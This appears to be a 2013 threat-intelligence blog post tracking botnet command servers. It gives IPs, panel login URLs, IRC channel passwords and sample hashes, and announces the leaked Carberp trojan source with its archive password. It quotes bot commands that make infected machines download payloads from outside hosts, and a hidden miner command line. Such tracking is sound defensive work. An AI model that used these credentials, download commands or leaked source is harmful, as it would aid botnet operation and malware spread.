Month: June 2013

zbraaadanstfesse.org (Pony loader hosted by chicagovps.net)

Resolved zbraaadanstfesse.org to 172.245.5.137
Server: zbraaadanstfesse.org
Gate file: /p/stats.php
This is currently being downloaded by this Citadel net. This is also a backup domain for a Betabot, and is the domain currently used by it.
Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php
Related md5s (search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f
Hosting infos: http://whois.domaintools.com/172.245.5.137

x.fullhdizle.co (Irc botnet hosted by hostforweb.net)

Resolved x.fullhdizle.co to 216.246.77.143
Server: x.fullhdizle.co
Port: 1989
Server password: r00t33
Channel: #xxx
Channel password: r00t33
Topic for #xxx is: !open hxxp://www.fullhdizle.co
Topic for #xxx set by Coder at Wed Jun 26 14:02:37 2013
Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d
Hosting infos: http://whois.domaintools.com/216.246.77.143

158.255.2.59 (Athena irc botnet hosted by hostkey.com)

Server: 158.255.2.59
Port: 6667
Current local users 436, max 2038
Channel: #network
#network         411
Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd
Hosting infos: http://whois.domaintools.com/158.255.2.59

Carberp The Banking Trojan Source Now Available To Public

First Zeus, now Carberp: the source has been leaked to the public.
Picture from dk forum.
Source and password for the rar archive are available via twitter, thanks to ivanlef0u. Another link for the source here (around 1.88GB).
Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”

srv1.su (Betabot http botnet hosted by softronics.ch)

Resolved srv1.su to 94.242.198.65
Server: srv1.su
Gate file: /b/order.php
Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using an HTTP bot. Unfortunately for him, he chose to use the l33t Hackforums bot Betabot with a 1MB stub AutoIt crypter, but I guess he can only manage to

srv1.su (snk’s botnet hosted in Luxembourg Steinsel Root Sa)

The bot is downloaded by this AutoIt sample: hxxp://sglegacy.com/AA/dava.exe, which looks like an HTTP AutoIt downloader. Login here: hxxp://www.sglegacy.com/AA/index.php/login
Another sample downloaded by dava.exe is this: hxxp://la-majeur.com/images/beta.exe (Betabot)
Here is dava.exe decompiled:

    $at2 = "0"
    $at5 = 0
    $at1 = "0"
    $at3 = "0"
    $avm = "0"
    $asb = "0"
    $at4 = "0"
    #NoTrayIcon
    #Region
    #AutoIt3Wrapper_UseUpx=n

y.osej36.com (Irc botnet hosted by gandi.net)

Resolved y.osej36.com to 92.243.8.222
Server: y.osej36.com
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e
!NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e
!s -n
A modified ircd is used, so you may have trouble connecting.
Alternate domains: y.v23sdy.com y.rwt234.com
Bitcoin mining info: minerd.exe -a scrypt -s 20 --no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x